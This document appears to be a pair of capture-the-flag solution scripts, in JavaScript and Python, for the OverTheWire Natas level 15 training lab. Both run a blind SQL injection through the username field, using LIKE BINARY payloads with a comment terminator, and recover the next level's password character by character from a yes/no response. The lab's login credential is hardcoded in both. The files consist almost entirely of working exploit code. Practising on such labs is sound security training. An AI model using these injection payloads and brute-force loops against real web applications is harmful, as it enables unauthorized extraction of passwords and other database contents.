File: OverTheWire/natas/natas15.js
(function () {
  let request = require('request'),
      // url = "http://natas15.natas.labs.overthewire.org/",
      url = "natas15.natas.labs.overthewire.org/",
      username = "natas15",
      password = "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J",
      // auth = "Basic " + new Buffer(username + ":" + password).toString("base64");
      chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
      filtered = [],
      pass = '',
      uri = `http://${username}:${password}@${url}index.php`;


  for( let i = 0; i < chars.length; i += 1 ) {
    let char = chars[i];
  request(
    {
      url: uri,
      qs: {
        username: `natas16" and password LIKE BINARY "%${char}%" #`
      }
      // headers: {
      //   "Authorization": auth
      // }
    },(function(c,i) { return function(error, response, body) {
      if( error ) { return console.log( error ); };
      if( body.match('exists') ) {
        filtered[i] = c;
        // filtered += char;
        // console.log( response.request.uri.query );
      };
    };
    })( char, i ));
  };
  setTimeout(() => {
    let filter = filtered.join('');
    let index = 0;
    recurse( index, filter );
  }, 2000);

  function recurse( index, list ) {
    let char = list[index];
    request(
      {
        url: uri,
        qs: {
          username:`natas16" and password LIKE BINARY "${pass}${char}%" #`
        }
      },(error, response, body) => {
        if( error ) { console.log( error ); };
        if( body.match('exists') ) {
          pass += char;
          if( pass.length === 32 ) {
            console.log( pass );
            console.log( "DONE!" );
          } else {
            index = 0;
            console.log( pass );
            recurse( index, list );
          }
        } else {
          index += 1;
          recurse( index, list );
        };
      });
  };
})()

File: OverTheWire/natas/natas15.py
import requests,string
from requests.auth import HTTPBasicAuth

uri = 'http://natas15.natas.labs.overthewire.org/index.php?debug'
# chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
chars = ''.join([string.ascii_letters,string.digits])
filtered = ''
passwd = ''

for char in chars:
    Data = {'username' : 'natas16" and password LIKE BINARY "%' + char + '%" #'}
    r = requests.post(
            uri,
            auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'),
            data = Data)
    if 'exists' in r.text:
        filtered = filtered + char
        print(filtered)

for i in range(0,32):
    for char in filtered:
        Data = {'username' : 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'}
        r = requests.post(
            'http://natas15.natas.labs.overthewire.org/index.php?debug',
            auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'),
            data = Data)
        if 'exists' in r.text:
            passwd = passwd + char
            print(passwd)
            break
